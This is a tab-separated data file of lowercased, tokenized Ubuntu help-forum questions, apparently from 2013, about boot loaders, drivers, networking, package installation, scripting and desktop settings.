307066	i ca n't add `` < domain type='kvm ' xmlns : qemu='http : //libvirt.org/schemas/domain/qemu/1.0 ' > ''	ubuntu 13.04 qemu $ virsh version compiled against library : libvirt 1.0.2 using library : libvirt 1.0.2 using api : qemu 1.0.2 running hypervisor : qemu 1.4.0 i want to use `` pass-through of arbitrary qemu commands '' so i convert from `` to `` http : //libvirt.org/schemas/domain/qemu/1.0 ' > '' using virsh edit . but after saving xml file , i open xml file again . i couldn ' find `` '' http : //libvirt.org/schemas/domain/qemu/1.0 ' > '' . what should i do ? plz~
307067	how to execute sudo commands with expect & send commands in bash script ?	can any body let me know how to execute sudo commands with expect . i tried the following but this is not working . can anyone give me suggestion please ? set login `` sasuke '' set addr `` hostname '' set pw `` mypasswd '' spawn ssh $ login @ $ addr expect `` $ login @ $ addr\ 's password : '' send `` $ pw\r '' expect `` # '' send `` output= $ ( sudo virsh list -- all | awk `` /running/ { print \ $ 2 } '' | tail -2 ) ; sudo virsh dominfo $ output '' expect `` password : '' send `` $ pw\r '' expect `` # '' hi , i tried the below script its executing without errors , but i didnt get the output . here is the script & the output when i executes . where am i doing mistake here set login `` sasuke '' set addr `` hostname '' set pw `` mypasswd '' spawn ssh $ login @ $ addr expect `` $ login @ $ addr 's password : '' send `` $ pw\r '' expect `` # '' send { output= $ ( sudo virsh list -- all | awk '/running/ { print $ 2 } ' | tail -2 ) } expect { password : { send `` $ pw\r '' ; exp_continue } `` # '' } send { sudo virsh dominfo `` $ output '' } ; # do n't know if you need quotes there expect { password : { send `` $ pw\r '' ; exp_continue } `` # '' } execution sasuke @ njob : ~ $ ./hypr.sh spawn ssh sasuke @ hostname sasuke @ hostname 's password : sasuke @ hostname : ~ $ output= $ ( sudo virsh list -- all | awk '/running/ { print $ 2 } ' | tail -10 ) sudo virsh dominfo ' $ output ' sasuke @ njob : ~ $
307068	grub issues acer aspire v5-513	ok , this laptop is pissing me off . i did a dual-boot install of windows 7 alongside ubuntu 13.04 . i 've done this many times on other systems , and never had a problem . i am now . the installation went fine , no errors at all , and i rebooted the laptop , ready to enjoy my new installation . it did n't happen . it did n't even bring up grub , just went right into windows . i rebooted into the live dvd and ran grub-install and update-grub , which both succeded with no warnings . i rebooted ... still no grub , so i updated the bios and tried again . still nothing . i 'm stumped and have no idea what to do . the bios is n't a secureboot bios , and i honestly have no further idea what it could be .
307069	android file transfer difficulties	i 'm having problems transferring stuff to my samsung galaxy s4 and its memory card . the long and short of it is that i just ca n't transfer certain files across : the music is mostly in .wma format , but several songs just wo n't transfer and the transfer protocol grinds to a halt every time it encounters one it does n't like , citing various errors , such as `` could not send object '' and `` could not get object handles '' furthermore , clicking on the mounted drive simply seems to render the gui unresponsive and the progress bar says i 'm going at a speed of less than 100 kilobytes per second , file transfer via samsung kies air is woeful as well , as it tells me that i have to install java to run it , whereupon i just run into the tons-of-tar.gz-files-but-no-executable problem . at the moment i 'm trying to transfer to the card via nautilus , i am seemingly unable to sync with rythmbox and banshee ca n't seem to find any of my music at all . thank you for your time .
307073	ubuntu 13.04 running within hyper-v networking very flaky	i am running ubuntu 13.04 ( i had started with 12.10 ) within hyper-v ( windows 8 pro ) on a samsung series 9 laptop . i have the wireless and wired interfaces shared with the vm . i 've been noticing that the wireless connectivity ( i.e . network connectivity within the vm when the host is connected over wifi ) is extremely flaky . typically in some scenarios the connection fails to get established . in other scenarios , the guest get an ip address and is able to connect while the host ( windows ) does n't pick up an ip address . so i have this weird scenario where the guest can get to the internet but not the host . any hints/ tips /suggestions . let me know if there 's any diagnostic information that might help . note this is a sporadic failure ( about 20-30 % of the time )
307074	problems with the boot menu	i am running windows vista and have had many problems before with it , but when i try to boot ubuntu to test it out it tells me 'unable to load disc please insert disc and press any key to continue ' or something like that . it happens every time i turn on the computer with a jump drive in too .
307075	why purchased music is not synched on u1 on windows7 ?	i ca n't determine why my already purchased music is n't available on windows 7 . could someone give me a hint ? thanks in advance .
307077	ubuntu 13.04 on amd athlon x2 250 in x86-64 mode kernel panic	i have an amd athlon x2 250 ( core : regor ) processor , asrock 880gm-le mainboard and ubuntu 13.04 iso for x86-64 . the system runs with 2gb of ram . i 've tested microsoft windows 7 home premium 32-bit and 64-bit operating systems on this machine and both systems run flawlessly on this cpu . my system uses 1920x1080 vesa vga output which seems to start ok initially ... this pc has a standard bios . and the system uses ahci sata to access the internal 500gb hard disk . when installing ubuntu i get as far as completing the user setup and the installer app copying files to the hdd . during the process i get a kernel panic and stack trace which mentions smp 0 - is there a conflict between the kernel and the amd processor i use in 64-bit mode ?
307081	nas setup with ubuntu	first of all , i have read simple nas setup for ubuntu , which is a bit beyond my needs at the moment . briefly , i am new to ubuntu linux as some of you already know . i need to build a nas with ubuntu - on which i can , at least for the time being , store files from my 2 win 7 64 bit computers - many , many tb 's of ntfs files . is there a `` how to '' on that for a newbie such as myself ? any additional software or interface required ? ( my network is gigabit - router and switch , wired only . )
307083	installing ubuntu on new hp laptop	i 'm very new to ubuntu my new laptop ( hp pavlion ) has windows 7 with 1 partition c ( 597gb ) and windows recover ( 3gb patition . it is full so i tried to partion again c to install ubuntu but it is immposible ... so to could i install ubuntu on same partion which is windows located ? or is there any way to install it
307087	where does the guest session store its configuration files	in my computer i have my account ( cyrex ) and the guest session . if my user cyrex stores its files in /home/cyrex where does the guest session store its files ? . for example , if i wanted to set the guest in a way so that when it loads it has a specific wallpaper , launcher icon size and any other customization i would want to do with it .
307089	ubuntu/unity : unminimize all windows	how could i unminimize all windows ( at least of the current workspace ) ? i basically want to show on the desktop all the opened windows .
307091	this system cache are so large ?	i just run a disk analyer for my ubuntu 12.04 . i found there is a huge folder under this directory ~/.cache/deja-dup . all the files inside name like duplicity-full.20121019t115047z.manifest.part / duplicity-full-signatures.20121019t115047z.sigtar.part but it contain more than 5g file there . anyone have any idea what is this file regarding ? ? can i delete them as they are eating up my disk storage . thank you .
307092	status of ubuntu tv ? can i use as an htpc interface ?	so i 'm building an htpc with some decent specs and was wondering if , with an ubuntu install , i can use the ubuntu tv interface ? home theater wise it makes more sense for me to just use an ubuntu interface than use either xbmc or plex . launching apps becomes easier as well . what 's the current development status on ubuntu tv ? is it usable ? i have n't heard news about it in a while .
307095	what is mir and why is it important ?	i 've heard a lot about mir lately . it seems to be a big thing in the ubuntu community . what exactly is mir and why is it so important ? will it affect me ?
307096	unable to connect to a netgear router	i am trying to get wireless working on my computer but i just ca n't ... . i 've searched for hours on how to connect to the wireless network -- i do n't know if i am doing something wrong , but nothing seems to work . i watched several videos on how to set my wireless connection . all of them clicked on the wifi connection icon in the right hand corner and it listed wifi connections you could connect to . when i tried that nothing was listed . it just said that my wired network was disconnected . so i tried to add an internet connection , i filled out the ssid , bssid , and the mac address , etc . i clicked `` apply '' and it still is n't connecting . i do n't have any experience with ubuntu . i would really appreciate a step by step on how to solve this . i 'm trying to connect to a netgear router , wirelessly .
307101	installation length	okay , so i 've been waiting for ubuntu 13.04 to install on my computer for about an hour . at first , it had the bar at the top and the desktop shown with a spinning cursor . now the bar has disappeared , and all i have is the spinning cursor . should it really be taking this time ? i did check to install flash and all that , but i did n't check for it to update . edit : nevermind . it finished .
307102	how to minimize pybitmessage to the system tray ?	i recently installed pybitmessage , and now i ca n't get it to minimize to the system tray . if i click the red x , it just exits ( unlike transmission , which can be configured to `` survive '' being closed - the red x can be made to simply hide the gui . ) i was wondering , is there a way to replicate this behavior in bitmessage , or de we have to wait for the developer to write this behavior into the program ? is there something i can do to ubuntu itself to hide the gui ? right now , i have rigged up a solution where it lives in workspace 4 most of the time ; i just switch to that workspace whenever i need to use the program . i 'd like something a little more `` professional '' , though .
307103	how to install my ati graphic card ?	my laptop has a ati mobility radeon hd 5650 , and i 've tried many ways to install the drivers but nothing has worked for me , how can i do it ? also , i 'm not sure why but when i put 'lspci -vvnn | grep vga ' it showes me this : vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4225/4250 ] [ 1002:9712 ] ( prog-if 00 [ vga controller ] ) vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati madison [ mobility radeon hd 5650/5750 / 6550m ] [ 1002:68c1 ] ( prog-if 00 [ vga controller ] ) what does this mean ?
307107	nic send dhcp discover packets but does not receive	my desktop connects fine to an intex router and gets an ip address from dhcp server on the router . however when i connect the ethernet port to a cpe bridge only dhcp discover packets are being sent and none are received . what could be causing this issue . please assist .
307111	programs to interact with hard drive and ram from terminal	to give you an idea of what i am looking to , for example , i have a gsm modem connected to a serial port of my machine . i can run a program called minicom and be able to directly communicate with the firmware in the modem using the at command set . here 's an example of me communicating with that modem on my ubuntu server : at+cgmi enfora , inc. ok at+cgmm enabler-ii g modem ok i can get all kinds of information by using at commands and most importantly i can check the status of the modem right from the terminal without going physically to the location and having to run something like memtest . i have my servers remotely , so i would like to find an equivalent program of minicom on ubuntu that will allow me to check the status of my hard drives and my ram ( since these are two critical components to my system ) . what are the best programs on ubuntu for doing diagnostics and interacting with the hard drive and ram from terminal ?
307117	ca n't install nvidia driver on ubuntu 13.04	here 's the case . my computer can boot ubuntu 13.04 but the time it loads my unity session -- i have set autologin , the video card chrashes and the monitor blacks out . even if i go console to do the job , because of the autologin , it again chrases . then i decided to go to the single login by adding single on the kernel parameter on grub at boot . it again crashes . but when i try to boot to windows , everything works out just fine . ps : i have also tried to use nomodeset on the kernel parameter . i have also guessing that the gpu had overheated because when i touched the gpu it is really hot . i have nvidia geforce gt220 . i have also done this at dawn .
307118	how can i start porting ubuntu touch to the iphone ?	i 've been interested in porting ubuntu to my apple hardware for quite some time and i 'm coming to the conclusion that i 'm going to have to do the port myself but i have no idea how to complete such a task . please advise me on how to port an os to another device , steps involved , and what i need to teach myself to be successful . do n't tell me apple wont allow it , its my hardware outright and i 'm dissatisfied with the current operating system on my hardware . the phone was purchased for full price , and i completed a 2 year contract agreement , and the iphone has n't been used as a phone for a couple of years now . i 've seen android on the iphone so my assumption is that it is possible . thanks for your replies in advance .
307119	uck or other software for creating customized iso	can someone tell whether uck on command line does not work with version 2.4.5 or 2.4.6 . i wish to create a livecd using commands of uck not uck-gui but while running the command uck-remaster-pack-rootfs it gives an error as `` failed to read '' and problem with uck-gui is one has to finalise the work and create the iso . it does not allow to continue work later . everytime even if a small change is made one has to build an iso . for again making changes this new iso has to be used . is there any other better option available to create livecd wihout making use of uck .
307123	installing htk error	i am having an issue when i try and make the file , ./configure worked perfectly fine for me when i try and make : zodiac @ zodiac : ~/downloads/htk $ make all ( cd htktools & & make all ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/zodiac/downloads/htk/htktools' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/zodiac/downloads/htk/htktools' ( cd hlmtools & & make all ) \ || case `` '' in *k* ) fail=yes ; ; * ) exit 1 ; ; esac ; make [ 1 ] : entering directory `/home/zodiac/downloads/htk/hlmtools' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/zodiac/downloads/htk/hlmtools' thanks in advance
307124	non-lts to lts ? possible ?	is it at all possible to move from an non-lts distro to an lts one , ie 13.04 to 12.04 lts ? if so , how would it be done ?
307131	i want to intall ubuntu on a windows 7 pc from a usb on a mac . what do i do ?	i have a pc that i want to wipe the harddrive and install ubuntu on it . the only other working machine i have is a mac . so i was wondering how i could install ubuntu onto a flash-drive and then install it onto the pc
307137	how to install the regular updates	i need help . i installed it without using the internet to install updates while it was installing . it had no errors after install . i now can not find the update button to check for updates . can someone help me either to find it or tell me what to type into the command line in order to install the system updates .
307142	+problems with apt-get	i just installed ubuntu 12.04 lts 64bit on my computer . i would like to install a f.e.m solver named code_aster but i need to install the following dependencies before this : gfortran , g++ , python-dev , python-numpy , python-qt4 , zlib1g-dev , liblapack-dev , libblas-dev , tk , grace , bison and finally flex i tried to run the following command to get them : sudo apt-get install \ gfortran g++ \ python-dev python-numpy python-qt4 \ zlib1g-dev liblapack-dev libblas-dev \ tk grace bison flex but it did not work . as the output of the terminal was rather long i tried to install them one by one and get the following messages : [ sudo ] password for redg : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gfortran to solve this i already read : this discussion and tried to install gfortran `` munally '' with this file but i failed in both ways . for python-numpy i get the following redg @ okdesu : ~ $ sudo apt-get install python-numpy reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-numpy if found this on the internet but it did not help much . it only confirmed the module was not installed . as i get similar errors with the other libraries i suggest we just focus on gfortran for now . thank you in advance for your help ! edit1 : i failed to mention i failed to mention i 'm using a proxy but everything seems to be fine on this side . this is what i found in the apt.conf file : acquire : :http : :proxy `` http : //150.73.3.41:80/ '' ;
307144	vodafone webbook	i have a vodafone webbook , but i have lost the password . what can i do to reset the assword ? holding down shift / esc / shift+esc does not bring up a grub menu .
307146	help with authentication password	when i try to install or remove software it asks for an authentication password but i do n't have a password and never set one so how do i reset the password
307149	attribute error : portal_url while testing a method	i need to test a method called addserverurl ( ) using the command `` bin/test -t addserverurl ( ) '' in terminal addserverurl contains the following code : def addserverurl ( self , html_src , prefix ) : url = gettoolbyname ( self.context , `` portal_url '' ) temp = html_src.replace ( 'href= '' mailto : ' , ' $ xxx $ ' ) temp = temp.replace ( 'href= '' ' , 'href= '' % s/ % s ' % ( url , prefix ) ) return temp.replace ( ' $ xxx $ ' , 'href= '' mailto : ' ) when run `` bin/test -t addserverurl ( ) '' in terminal i m getting the following error file `` /home/oomsys/brundelre3/src/bdr.theme/src/bdr/theme/browser/createpictmenu.py '' , line 159 , in addserverurl url = gettoolbyname ( self.context , `` portal_url '' ) ( ) file `` < string > '' , line 10 , in check_gettoolbyname file `` /home/oomsys/brundelre3/eggs/products.cmfcore-2.2.7-py2.7.egg/products/cmfcore/utils.py '' , line 120 , in gettoolbyname raise attributeerror , name attributeerror : portal_url why am getting error in `` url '' ? ? ? any one pls help soon .
307153	mouse not moving , but still clicks !	i 'm using ubuntu 12.04 lts . last night when i started my computer , i saw a strange screen telling me this : the system is running in low-graphics mode your screen , graphics cards , and input device settings could not be detected correctly . you will need to configure these yourself . there , my mouse was not working and i could n't hit the ok button ! i searched and re-installed my graphic . i fixed it and the next time it booted normal , but with the mouse not moving problem remaining ! everythings fine , but my touchpad 's not moving , but it can click ! a few moments ago , when i was trying to do something , i saw this strange message : ca n't grab your mouse . and for the record , here 's the last lines of my /vat/log/xorg.0.log file : [ 519.404 ] synps/2 synaptics touchpad : not enough space for touch events ( max 1 touchpoints ) . dropping this event . [ 519.404 ] [ dix ] synps/2 synaptics touchpad : unable to begin touch point 1 [ 519.434 ] [ dix ] synps/2 synaptics touchpad : unable to find touch point 1 [ 519.448 ] [ dix ] synps/2 synaptics touchpad : unable to find touch point 1 [ 519.464 ] [ dix ] synps/2 synaptics touchpad : unable to find touch point 1
307156	problems unraring a split file in ubuntu 12.04	i installed rar but when i run unrar x -e file_name.part01.rar i get the error message `` failed '' . can someone tell me what i 'm doing wrong . i 'm pretty new to ubuntu .
307158	use cm roman ( latex font ) in inkscape ?	i made a svg in inkscape on fedora with the cm roman ( latex ) font , but when opening the svg on ubuntu 12.04 , it says it does n't have cm roman even though texlive is installed . how do i use the cm roman font in inkscape on ubuntu ?
307160	blank screen after gui install	i have installed ubuntu 12.04.2 x64 without a problem at all and i wanted to install the gui ( ubuntu-desktop ) . i followed the below steps : sudo apt-get update sudo apt-get install ubuntu-desktop ubuntu went through the installation and then the screen on my acer v193l went black and there is currently no output to the screen . the pc is doing something as the hdd light flickering none stop . the pc which i have installed ubuntu on is a hp 8000 elite and has an ati graphics card installed . if someone could point me in the right direction that would be great . thanks ! !
307163	fresh install does n't appear to work	alrighty so here is the story : recently installed ubuntu 13.04 onto my dell inspiron 1745 via live usb setup through unetbootin . live usb works fine , using a 64bit image , able to browse the net , do the install , run all the updates and whatnot while installing , no issues after installation has completed , no errors are produced ( or atleast non that are brought to my attention ) i reboot , and what do i see , an error about kernel panic , not-syncing : no init found , suggests to use init= option , and refers me to the init.txt file . as well something about a runaway loop mod ( which as far as all my research is concerned seems to be something about wrong architecture ( i.e 32bit on 64 bit : / ) now i am not really brilliant with linux like some of the true guru 's here , but i 'll go through what i have done so far : run disk integrity check of my live usb , and a memory check on my computer ( both of which came up with pass ) checked the drives fstab , which seemed to show it knew the mount point as '/ ' . checked the boot folder ( as it seems grub2 is now used ) which has both the initrd.img-.. and vmlinuz- ... . files . checked the grub.cfg file , for what options it was using , and it seemed to refer for root='hd0 , msdos ' which although my experience with system references say it should be sd* or something like that found that grub2 refers to the first hdd like that now ( though did try changing it on some runs ) tried reinstalling multiple time tried including the init= in the linux section of the bootloader ( pushed 'e ' , and then included the exact location of the initrd file as i assumed that is what it meant ) used the debug mode though found could n't retrieve any information . i did attempt to look at /var/log/dmesg though found that it said ( nothing has been logged yet. ) . i have googled on numerous forums , and found majority of fixes do n't seem to work . have attempted both the 32 and 64bit build just to check if that impacted it . so i am currently out of ideas and wondering if anyone could suggest something to try or a place to look for more info , any assistance would be much appreciated .
307167	is there any way to use https in the ubuntu ?	i live in iran and many of sites such as bbc world are blocked by our betray government so i do n't have access to suchlike sites . please guide me how i can use https in the ubuntu . i have address and user+pass for my https account .
307203	edc integration thunderbird - timeout	at a certain time after starting thunderbird i get this message : there was a problem opening the address book ... with the additional information that a timeout occured . i am running gnome shell 3.8 on raring . any ideas where i can find more information about this error or how to fix this ? i have not found any logged information according this error on my system yet .
307206	laptop speakers dont work	i can not hear the sound any more on my laptop , i get only dummy-output on my audio device . who can help me ? ubuntu 12.10 is installed .
307207	how do i 'workon ' a python virtualenv in byobu windows configuration ?	i 'm trying to configure byobu that it will start with a few windows ready in my python virtualenvwrapper project directory . the only thing that needs to be run is the command workon myvirtualenvname . what i 've done now is this . selected the screen backend using byobu-select-backend in ~/.byobu/windows : screen -t env2-1 workon env2 screen -t env2-2 workon env2 starting byobu now fails . running byobu results in a error being shown for a short period of time : can not exec 'workon ' : no such file or directory and byobu terminates : [ screen is terminating ] i think the issue originates in the way the workon command is defined . as with the virtualenvwrapper documentation , this is being set in ~/.bashrc by sourcing /usr/local/bin/virtualenvwrapper.sh . in the latter file this workon command is defined as a bash function ( function workon { ) . how can i make screen/byobu start my windows as defined in the configuration despite it being bash functions being run in there ? i 'm using ubuntu 12.04 and virtualenv 3.6 ( not on 4.x yet as i see it has some backward incompatibilities ) .
307213	software center shows `` use this source '' instead of `` install ''	last time i installed ubunu i notice that in ubuntu app center , most apps are missing install button , instead it is `` use this source '' button and i ca n't install anything . i 've tried to use update command in terminal but it did n't work , they say it was internet error but i 'm using firefox right now .
307221	how to get the address with /proc/kallsyms	cat /proc/kallsyms | grep `` \ doexecve $ '' i run this command in ubuntu 13.04 in virtual box in order to get address . however , no result . how to get the address for kprobe debug
307222	how to restart alt+f2 dialog in kde after xkill ?	the dialog that appears when i press alt+f2 froze ( what is it called ? minicli ? ) , i then proceeded to kill it by clicking it after running the command xkill , this was the message : xkill : killing creator of resource 0x240017b i then tried restarting plasma-desktop : killall plasma-desktop plasma-desktop thought this seemed to correctly restart the desktop , it did n't solve the problem since alt+f2 does n't launch the launcher .
307223	how to install ubuntu touch on my samsung galaxy ace ?	i wanted to install ubuntu touch on samsung galaxy ace ! but i do n't know the procedure and the ram to be used for the same ! if anyone could help me that would be great ! thanks
307224	problem in updating using synaptic package manager	when i perform update during synaptic update manager the error is as follows : the upgrade needs a total of 405 m free space on disk '/ ' . please free at least an additional 286 m of disk space on '/ ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . i had tried using sudo apt-get clean but this command does nothing . i vaguely remember during installation i had put low space for `` / '' . can you please tell how to free my '/ ' space now ? or i have to reinstall ubuntu ?
307225	what is the logic behind the user name restrictions in *buntu ?	in fedora , i use my preferred account name , which happens to be a fully qualified domain name . by using a fully qualified domain name as my user name across most of my accounts ( both on my own computer and across the web ) , i minimize the chance that my usual user name is taken . there are some services that do not allow this , due to character restrictions , and that is fine . but in fedora , my usual name works . this is proof that gnu/linux can handle user names that begin with a digit ( as mine does ) and contain dots . however , *buntu does not allow this , and i have to use a permutation of my name . ignoring the outright disallowing of dots , *buntu even does fine with digits , but not at the beginning ... strange . is this a problem ? no , not really . i 'm not looking for a solution . i just want to know why this is . is this purely arbitrary , or is there some reason for these odd restrictions ? why is *buntu unable to offer as much flexibility in this area ?
307226	how to dual boot ubuntu 12.04.2 and windows 8	i have pre-installed windows 8 in my hp laptop ( 64 bit ) and i installed ubuntu 12.04.2 ( 64 bit ) in it . but i cant able to dual boot these two.when i open my laptop it directly opens the windows 8 . please help me
307229	how can i create a separate data partition ?	the home partition holds all user data and settings . when backing up my home partition it contains a lot of data ( the settings ) i do n't need . so i thought i could create a separate data partition and mount it to ~/data . that would make my backups smaller and the backup process easier because all my important data is on this partition and nothing else . how can i create and mount such a partition . is it possible to set this up during the ubuntu 12.04 lts installation ? another important thing would be that the places shortcuts in nautilus ( documents , music etc . ) should point to the directories in my data partition . is that possible ? thanks for your time
307232	not able to connect to juniper vpn on lubuntu 13.04	i am using lubuntu 13.04 . tried this with chrome , firefox and epiphany with the same result . i log into my vpn webpage click start to open a connection . window pops up asking me if i want to install the jar file - > i click yes terminal pops up asking me for root password which i enter progress bar updates momentarily when it seems to time out and i am returned to step 2 i click start again and the progress bar continues where it left off , repeat this a few times eventually progress reaches end of bar but nothing happens if i ping the machine i am trying to connect to the machine is not found i do n't see the vpn in my list of connections i have tried the steps outlined by mad scientist at http : //mad-scientist.us/juniper.html but it does not connect either ( status show `` connecting '' for a second then `` disconnected '' ) , but i think something fundamental is going wrong before this stage anyway . any ideas ? *update*** according to the juniper site from 7.3 onwards , juniper sa devices support 64-bit ubuntu for network connect : '' a native 64-bit vpn tunneling client is not yet available . instead , changes in the existing 32-bit client were made so that it can be run on 64-bit platforms . because of this , vpn tunneling has dependencies with 32-bit java and 32-bit standard libraries even when running on a 64-bit platform . '' - http : //www.juniper.net/techpubs/en_us/sa7.3/topics/reference/general/secure-access-nc-64-bit-linux-support.html so apparently the answer is to install the 64bit jre/jdk and icedtea then install the 32bit jre : sudo apt-get install openjdk-7-jre icedtea-7-plugin sudo apt-get install openjdk-7-jre : i386 i wiped my drive , reinstalled and tried the above without success . after entering my root password i would expect something to happen notifying me i am connected to the vpn , but as i said i keep getting returned to the page with the start button and if i keep clicking this eventually the progress completes but no notification that i am connected and i am unable to ping the machine . that being said if i log out and back into the vpn website i get a message that another session is in progress . however if i type 'mcli con ' in the terminal ( not sure if this is the best command to use ) i do n't see any vpn connection i have verified on java.com that java 7 64 bit is my default .
307236	bluetooth not working in 12.04 lts	i 'm unable to use bluetooth on my new aspire one netbook . here are the terminal result : $ lsusb bus 001 device 002 : id 04f2 : b367 chicony electronics co. , ltd bus 005 device 002 : id 0489 : e048 foxconn / hon hai bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no 2 : acer-wireless : wireless lan soft blocked : no hard blocked : no 3 : acer-bluetooth : bluetooth soft blocked : no hard blocked : no just wondering if anyone can help me in fixing the issue .
307237	how to prevent a user from deleting messages and changing the settings of thunderbird	how to prevent a user from deleting messages and changing the settings of thunderbird because i do n't want a user delete any messages or change the settings of thunderbird only admin can change anything of thunderbird . please suggest me the right way .
307240	replacing windows od drive with ubuntu	i have windows 7 in my system . i want to replace it with ubuntu without losing any of my data in other drives . is it possible ?
307241	how to take automatic screenshots in ubuntu 12.04 every 2 minutes	i am ubuntu 12.04 user and i want my machine take automatic screenshots of my work every 2 minutes . so which software you prefer . please suggest me .
307246	has my dell laptop come with partitions ?	i have done lots of searches , and found lots of useful advice on partitioning the ubuntu system so that the ubuntu operating system ( /root ? ) is in a separate partition to all my files , folders , photos etc . ( /home ? ) . i have used gparted from the live iso disk to look at partitions . none of the previous questions i have viewed have been able to answer my exact question . my gparted screenshot looks like this ; apologies for poor quality image , grabbed it with my camera ) . it seems to be that the ubuntu system that came on my laptop `` out of the box '' is already partitioned ? with sda2 as the operating system and sda3 as the rest of the disk space for storing files etc. ? is this the case ? do i need to do anything else to ensure files etc . are only going to the sda3 partition ? perhaps i should check mountpoints somehow ? any advice really appreciated .
307251	ubuntu 13.04 desktop background problem	i have a problem with my desktop background after last update . my desktop wall paper looks like mosaic and when i open any window , the background keeps the trail of it . i 've tried running in fail safe graphics more , no fix . i 've tried installing ubuntu-desktop and unity , no fix . please help .
307252	unable to mount nexus 4	i have installed 13.04 & i ca n't mount my nexus 4 . here 's the error . unable to open mtp device ' [ usb:002,007 ] ' any ideas ? ?
307255	block from installing network-manager	how can i , for always , block the installation of a package ? ( in this case : network-manager ) i previously did echo network-manager hold | dpkg -- set-selections after some update i found that it was installed again . how can i get it to stay blocked ?
307261	partition to run a windows program	i like using linux ubuntu and have few problems . however , i need to run an exam marking program that will only run on windows . how can i create a windows partition without wiping and re-installing linux ubuntu ? help is appreciated .
307265	chroot environment can access external , but not internal network	i 've just set a chroot environment up on a new 12.10 install , and it seems capable of accessing the external network ( internet basically ) but it can not access anything on the internal network inside chroot . the box definitely has network access internally , and it 's connected to the network , it 's using a prebuilt chroot environment that 's worked perfectly well elsewhere so i 'm puzzled . edit : to clarify , we have a series of scripts that run to create an ubuntu environment and then create an iso image within a chroot environment we 've created . the chroot environment should be able to reach a hostname within our internal network where we have an apt repository to pull some additional packages in . the chroot environment can communicate with external servers , but for internal connections it ca n't ping either the host name or ip address .
307266	tunnelbear alternative	is there a tunnelbear alternative for ubuntu i need a software beside web browser to access the internet with a country of my choice `` us '' and then disable the vpn and enable my default network on windows there is a tunnelbear but there is not a linux version of this software any ideas thank you in advanced for the solution you can use this article
307269	hangouts in systray on ubuntu 12.04	there 's a way to have the hangouts icon in the systray ? i 'm trying to use the dconf editor , but i do n't known the specific exeption that i have to put in the whitelist string for the hangouts icon . do you know it ? ps : i do n't wont to use the [ 'all ' ] option because i want to see only the hangouts icon .
307270	is it possible to install ubuntu and windows and backtrack 5r3 on the same computer ?	well as it shown in the title ..i 'm wondering if i can install 3 oprating systems on my computer ..i have ubuntu and windows vista dual boot already ( yes windows vista still working with it because of sonyvaio did n't make this computer to support other operating systems , whatever that 's not our topic ) so i do n't want to replace ubuntu 13.04 with backtrack and i 'm wondering if i can keep up on them all .. i installed backtrack on vmware workstation but its very slow and had so many problems and i do n't want to install it on vmware or virtual box but a dual boot or triple boot lol ..help guys .. tahnks alot : )
307274	acer aspire 1 wont start	acer aspire 1 with ubuntu 12.04 , was windows xp . had battery problem ( would not start on fully charged battery ) windows bios update solved problem but pc not been used for some time is there a bios update i can use with ubuntu
307277	update to 13.04	with ubuntu 12.10 everything was perfect . a few days ago i upgraded to version 13.04 and only gives me problems . with 13.04 i saved what i do after rebooting . for example , firefox bookmarks disappear and i have to recreate them . icons or programs that put in the left margin ( favorite programs ) also disappear when the computer restarts . all that i have saved in downloads also disappears ... i want to know if i can return to the version 12.10 or 12.04 , and what would be the easiest way to do this , because i do n't have many computer skills . thanks
307279	what are the steps to modify a filesystem ( say xfs ) ?	i intend to make some changes to xfs filesystem . i have never done this before . i am running ubuntu 12.04 kernel 3.2.0-40-generic-pae is there a documentation on the steps involved in doing so ? i tried google but found nothing of much use . i have a rough understanding of the steps involved ( see below ) , but i am looking for a detailed description so that i do n't get stuck on simple things . steps in my mind : download the source of xfs for my kernel version ( using apt-get install linux-source ... ) make changes to the source file compile only the modified source code of xfs ( when i tried to `` make '' it asked for some conf file , which i am not sure where i can get from ) ( do i have to recompile the whole kernel or just xfs is fine ? ) rmmod the xfs module and then insmod the xfs module so that changes are reflected in the system . create a new partition , format it with xfs and test if things are alright after my changes . looking forward to some useful pointers . its ok if the pointers are for some other fs like ext3 or 4 as i believe the details would not vary from fs to fs .
307280	how do i install applications in ubuntu ?	i am new to ubuntu . how can i install applications like google chrome in ubuntu ? are there any commands to install an application ?
307281	today nautilus reverts back to icon theme ubuntu-mono-dark although the desktop interface settings is set to faience-ocre	i run ubuntu 12.04 precise . i did configure a year ago through advanced settings / dconf my icon theme to faince-ocre and my windows theme to adwaita cupertino l unity . i kept the gtk+ theme as adwaita ( default ) . this morning i had the surprise to see nautilus reverting back to icon theme ubuntu-mono-dark and radiance window theme ( both ubuntu defualt ) as every other application still use the [ dconf ] org gnome desktop interface settings i.e . faience-ocre icon theme and adwaita cupertino l unity window theme . also when launching nautilus in super user mode via $ gksu nautilus nautilus looks like before and is un-affected by the defect . i went to /usr/share/icons/ and renamed the ubuntu-mono-dark theme as ubuntu-mono-dark.bak . this caused nautilus to instantly use the gnome icon theme ... i do n't understand what is going on . why icon theme reverted to default ubuntu-mono-dark in nautilus only for the user . in the mean time i will use another file manager .
